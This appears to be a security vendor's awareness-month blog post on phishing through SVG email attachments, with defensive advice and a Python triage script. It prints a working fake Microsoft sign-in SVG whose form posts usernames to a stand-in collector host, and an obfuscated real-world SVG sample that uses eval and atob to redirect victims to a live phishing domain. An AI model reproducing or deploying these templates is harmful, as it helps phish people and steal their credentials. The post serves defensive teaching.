This October, in celebration of 2025 Cybersecurity Awareness Month and its theme “Stay Safe Online,” we’ll be sharing weekly resources — including blog posts, training videos, and infographics. Each release will spotlight key topics to help strengthen your internal cybersecurity campaigns.
Threat actors have made considerable advances in phishing since the days of poorly written emails that linked to fake login pages for popular banks, email services, or social media platforms. These malicious innovations are all designed to increase the threat actor’s success rate, either by increasing the likelihood that the message reaches their victim’s inbox or by increasing the time the phishing site is live.
One of the tools we use to take down phishing pages is the Digital Millennium Copyright Act (DMCA). Registrars, hosting providers, and infrastructure providers will usually act when presented with clear evidence that one of their customers is hosting trademarked and/or copyrighted material. While the DMCA is a US law, many other countries have similar statutes. Additionally, many non-US technology providers have some sort of presence in the United States, opening their US subsidiaries to punitive action should a DMCA takedown request be ignored.
Most modern phishing kits include code designed to hamper investigation of trademark infringement by cybersecurity researchers, registrars, hosting providers, and infrastructure providers. This can be as simple as an IP blocklist or may include additional checks such as requiring a specific client time zone or user agent string.
A more diabolical approach is to separate the trademark infringement from the credential exfiltration. By including an HTML, SHTML, or SVG file as a message attachment, the bad actor can ensure the trademark-infringing material is part of the email message with no direct tie to the underlying site that collects pilfered credentials. This makes it nearly impossible to have the credential-collecting script taken down, as the script itself is not infringing on any trademark. Rather, the infringement occurs solely within the email message attachment.
Below is an example of a Microsoft login page generated using Scalable Vector Graphics (SVG):

The code that generates the bogus Microsoft login page is shown below:
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%">
  <defs>
    <radialGradient id="Gradient" cx="0.0" cy="0.0" r="1.0" fx="0.25" fy="0.25" spreadMethod="pad">
      <stop offset="0%" stop-color="#e9dedb" />
      <stop offset="70%" stop-color="#dee4e9" />
      <stop offset="100%" stop-color="#ebe6de" />
    </radialGradient>
  </defs>
  <rect x="0" y="0" width="100%" height="100%" fill="url(#Gradient)" />
  <rect x="200" y="100" width="400" height="270" fill="#FFFFFF" stroke="#999999" stroke-width="1"/>
  <g transform="translate(220,120) scale(1)">
    <rect x="0" y="0" width="12" height="12" fill="#F25022" />
    <rect x="14" y="0" width="12" height="12" fill="#7FBA00" />
    <rect x="0" y="14" width="12" height="12" fill="#00A4EF" />
    <rect x="14" y="14" width="12" height="12" fill="#FFB900" />
  </g>
  <rect x="200" y="380" width="400" height="50" fill="#FFFFFF" stroke="#999999" stroke-width="1"/>
  <circle cx="250" cy="400" r="8" stroke="#333333" fill="transparent" stroke-width="1"/>
  <circle cx="249" cy="397" r="1" stroke="#333333" fill="transparent" stroke-width="1"/>
  <polyline points="257 401 266 413 266 416 262 416 262 413 259 413 259 410 256 410 256 407 253 407" stroke="#333333" fill="#ffffff" stroke-width="1"/>
  <text x="280" y="410" fill="#333333" font-size="16" font-family="times">Sign-in options</text>
  <text x="250" y="142" fill="darkgrey" font-size="26" font-family="sans-serif">Microsoft</text>
  <text x="220" y="180" fill="black" font-size="24" font-family="times">Sign in</text>
  <foreignObject x="210" y="200" width="620" height="150">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <form action="https://evilsite.com/capture.php" method="post">
        <input type="text" name="username" style="border-bottom:1px solid #385879;border-top:0px;border-left:0px;border-right:0px;width:350px" placeholder="Email, phone, or Skype"/><br/><br/>
        <span style="font-size:10pt;font-family:times;color:black">No account?</span>
        <a href="#" style="font-family:times;font-size:10pt;color:#2d617d;text-decoration:none">Create one!</a><br/><br/>
        <a href="#" style="font-family:times;font-size:10pt;color:#2d617d;text-decoration:none">Can't access your account?</a><br/><br/>
        <table><tr><td width="150"> </td><td style="text-align:right" width="200"><input type="submit" name="next" value="Next" style="color:#ffffff;background-color:#0067b8;font-family:times;font-size:12pt;border:solid 1px #0067b8;width:120px;height:30px"/></td></tr></table>
      </form>
    </body>
  </foreignObject>
</svg>
In my example, the entered username is posted to https://evilsite.com/capture.php. In practice, the SVG content could be more complex and might even conduct a man-in-the-middle attack to mimic the organization’s custom sign-in page and capture the user’s multifactor authentication code.
Sometimes, SVG is used solely to increase the likelihood that a phishing message will reach the victim’s inbox. In these cases, the SVG code is often generated using obfuscated JavaScript, further complicating analysis by both humans and anti-spam filters.
Below is one example we encountered recently. The email message explained that the victim had an overdue invoice and instructed them to view the “invoice” by opening the attachment. The SVG code contains several blocks of BASE64-encoded text embedded within JavaScript comments — none of which serve any purpose other than to distract from the script’s actual purpose.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Aliquip mollit short loin cillum sed adipisicing. -->
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
  <!-- Q2lsbHVtIGN1cGlkYXRhdCBmcmFua2Z1cnRlciBncm91bmQgcm91bmQgaW4gc2ludCBwb3JjaGV0dGEgZWxpdCBlc3NlIGtpZWxiYXNhIGRvbG9yZS4= -->
  <script type="text/javascript">
  <![CDATA[
  function DumpSys_m95PceYkBaBxhD5DEiBn5a0wNwtkLKTI28PBVD1zFUpun5B9YV0qg6mkPjadZBWzsAJbtzWtvRR5joP9ArxAHilxhesRLDAxOKJIB88OCregqrDFkDfEigZvXRd3mgDSrpAMf8bxWFgr96plKG6qRhloabZx8OFIMddDaM4x() { /* ferromagnetisms */ }
  /* UHJvc2NpdXR0byBleGVyY2l0YXRpb24gaGFtYnVyZ2VyIHJ1bXAgaWQgYm91ZGluIGV0IGZsYW5rIHNhbGFtaSBiZWVmIHJpYnMgcXVpcy4= */
  /* Dolore meatloaf ullamco aute cupim cow. */
  buffet = '[email protected]';
  /* TGViZXJrYXMgcnVtcCBzdHJpcCBzdGVhayBwcm9pZGVudCBsYWJvcmlzLg== */
  /* Dolore minim ex, proident ea jowl anim non ball tip ground round short loin lorem ham. */
  function DumpSys_hA7D95I5qhnUgWJORyUywDrUsernt5BJbCjaPqtEcreQBI4wwFzWHSQ7AMkT3kBdJdu4YxUVF8W0oq8E9U9Yt8hzkxad976M92gNjgmD8SC70eYVwsJCXuVEPnFt2IfUDqEyCHNu93PL() { /* caseates */ }
  /* Alcatra proident esse deserunt beef ribs. */
  function DumpSys_JTciin0eQzJWtcHjQ39upOBNLZQfUUmggBeS1GrILSbkUbYiHIZP0DCfjrScbxYY5bUTXSdwGLBgrc3rgAW4hFEo9kb5ayPT8RczWQsOfsHb1EZmRYS5095DOTvE8CaTh3wDpzp7D8tGx6tdjLBUGpJvqBDqXxQ5FD1ZJxN791QxI07ZsMI() { /* inosculating */ }
  function DumpSys_m95PceYkBaBxhD5DEiBn5a0wNwtkLKTI28PBVD1zFUpun5B9YV0qg6mkPjadZBWzsAJbtzWtvRR5joP9ArxAHilxhesRLDAxOKJIB88OCregqrDFkDfEigZvXRd3mgDSrpAMf8bxWFgr96plKG6qRhloabZx8OFIMddDaM4x() { /* ferromagnetisms */ }
  /* RG9sb3Igb2NjYWVjYXQgdHJpLXRpcCBzaXJsb2luIGlkIHRlbXBvciB2ZWxpdCwgYWxjYXRyYSBzaW50IHNob3J0IGxvaW4gYWRpcGlzaWNpbmcgdGVuZGVybG9pbiB2ZW5pYW0gYnVyZ2RvZ2dlbi4= */
  /* Est laboris et, ham ball tip ea cupim anim turkey sint in meatloaf deserunt. */
  function DumpSys_8GVMowmqasxAajGcqdYNtIhBk7yqlMhVCyRmh7nlwG457ICTrhaOCVrTsj5qrHunGUfVIBg8lFMV7RL41kmLgJBG51YCTLjLbP2pT2tauoadNUDkdnfTtyyog6rn7RdEei9qRPSAMV4O6H() { /* tahr */ }
  function DumpSys_6lXCSY9I6BQ0WNtMu4OzPqVNInvgj6GeqN14Vob8paQerpXJ6RjMiJ1fANciIvjZN7UXkY7LevH5NTLUkJDT0EagWRhNl1OHjhAnRITk2S9YE3M2Kqest3tZl0NB8zv1ZpvWNYGCyHW5OR() { /* adapter */ }
  /* Et rump consectetur meatloaf elit. */
  (function() /* TGViZXJrYXMgcnVtcCBzdHJpcCBzdGVhayBwcm9pZGVudCBsYWJvcmlzLg== */ {
    /* Qm91ZGluIHBhbmNldHRhIGR1aXMgbWluaW0gaW4gcG9yayBiZWxseSBwcm9pZGVudCB0YWlsIGxhYm9ydW0gbW9sbGl0IGVpdXNtb2Qu */
    eval /* Est laboris et, ham ball tip ea cupim anim turkey sint in meatloaf deserunt. */ (
      /* Q2lsbHVtIGN1cGlkYXRhdCBmcmFua2Z1cnRlciBncm91bmQgcm91bmQgaW4gc2ludCBwb3JjaGV0dGEgZWxpdCBlc3NlIGtpZWxiYXNhIGRvbG9yZS4= */
      atob('c2V0VGltZW91dChmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAn') +
      /* TGViZXJrYXMgcnVtcCBzdHJpcCBzdGVhayBwcm9pZGVudCBsYWJvcmlzLg== */
      atob('aHR0cHM6Ly9odWpraWUudGhlb3Rhb3d1YWdvLmNvbS8=') +
      /* caseates */
      buffet +
      atob('JzsgfSwgMCk7')
    );
  }) /* Voluptate cupim salami officia sunt jowl pastrami pork belly enim tempor capicola deserunt qui laborum. */ ();
  ]]>
  <!-- Tm9zdHJ1ZCBsb3JlbSB2ZW5pc29uIG1vbGxpdCwgaXBzdW0gdHVya2V5IGplcmt5IGN1cGlkYXRhdCBuaXNpIG1pbmltIG5vbiBwaWcgcGFuY2V0dGEgbnVsbGEgYWQu -->
  </script>
  <!-- Spare ribs swine incididunt occaecat pariatur, commodo laborum. -->
</svg>
The base64-encoded comments are somewhat amusing, as they contain Latin words peppered with English words for various cuts of meat, for example:
Cillum cupidatat frankfurter ground round in sint porchetta elit esse kielbasa dolore. Leberkas rump strip steak proident laboris.
Stripping away all the extraneous comments and de-obfuscating the code reveals the script’s true intentions:
(function() {
  setTimeout(function() {
    window.location.href = "https://hujkie.theotaowuago.com/[email protected]";
  }, 0);
})();
Note that this example did not use SVG to separate trademarked material from the phishing page. Rather, the SVG served merely as a mechanism to direct the victim to a traditional credential phishing page.
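Both patterns described above (the login form smuggled in through <foreignObject> and the redirect rebuilt from atob() pieces buried in junk comments) can be flagged mechanically before anyone opens the attachment. The triage helper below is an added example, not code from the original post; it uses only the Python standard library, and the two SVG samples it runs against are constructed here with placeholder hosts (collector.example.invalid, redirect.example.invalid) rather than taken from a real campaign.

```python
import base64
import re
import xml.etree.ElementTree as ET

SVG = "{http://www.w3.org/2000/svg}"
XHTML = "{http://www.w3.org/1999/xhtml}"
# A base64 literal passed straight to atob(), in single or double quotes.
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")

def decode_atob_literals(script_text):
    """Decode each atob() literal in source order and join the pieces, so a payload
    built as atob(prefix) + variable + atob(suffix) reads back as one string."""
    pieces = []
    for b64 in ATOB_RE.findall(script_text):
        try:
            pieces.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            pieces.append("<undecodable>")
    return "".join(pieces)

def triage_svg(svg_text):
    """Return findings for one SVG attachment; an empty list means nothing was flagged."""
    findings = []
    root = ET.fromstring(svg_text)
    for script in root.iter(SVG + "script"):          # any <script> is suspect in mail
        findings.append("script element present")
        text = script.text or ""                       # CDATA body, JS comments included
        if re.search(r"\beval\b", text):
            findings.append("eval() call in script")
        decoded = decode_atob_literals(text)
        if decoded:
            findings.append("atob() literals decode to: " + decoded)
    for form in root.iter(XHTML + "form"):             # XHTML form via <foreignObject>
        findings.append("XHTML form inside SVG posting to " + (form.get("action") or "<none>"))
    return findings

def _b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample 1: login form smuggled in through <foreignObject> (placeholder host).
FORM_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%"><text x="20" y="40">Sign in</text>
<foreignObject x="10" y="60" width="400" height="150"><body xmlns="http://www.w3.org/1999/xhtml">
<form action="https://collector.example.invalid/capture.php" method="post">
<input type="text" name="username"/><input type="submit" value="Next"/></form></body></foreignObject></svg>"""

# Constructed sample 2: redirect rebuilt from atob() pieces hidden among junk comments.
REDIRECT_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200"><script type="text/javascript"><![CDATA[
buffet = 'victim@example.invalid'; /* %s */
(function() { eval /* noise */ ( atob('%s') + atob('%s') + buffet + atob('%s') ); })();
]]></script></svg>""" % (_b64("Leberkas rump strip steak proident laboris."),
    _b64("setTimeout(function() { window.location.href = '"), _b64("https://redirect.example.invalid/"), _b64("'; }, 0);"))
```

Run `triage_svg()` over each SVG part of an inbound message at the mail gateway or in a sandbox; any non-empty result is reason to quarantine the attachment, and the decoded atob() string gives the analyst the redirect target without executing the script.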
We first began seeing malicious SVG attachments in late 2024; however, it wasn’t until May 2025 that large-scale phishing campaigns began utilizing this technique. Fortunately, it’s relatively easy to prevent malicious SVG attachments from impacting your business. Because stand-alone SVG documents are rarely used for business purposes, you should consider adding a rule to strip SVG attachments from all inbound messages originating from outside your organization.
If you receive an SVG attachment in your work or personal email account, it’s very likely a phishing scam. Report the message to your corporate security team or your email provider using the “Report Phish” or “Report Spam” button, and do not open the attachment.
Explore the infographic below to learn the anatomy of an SVG phishing attack and how to protect yourself from malicious SVGs.
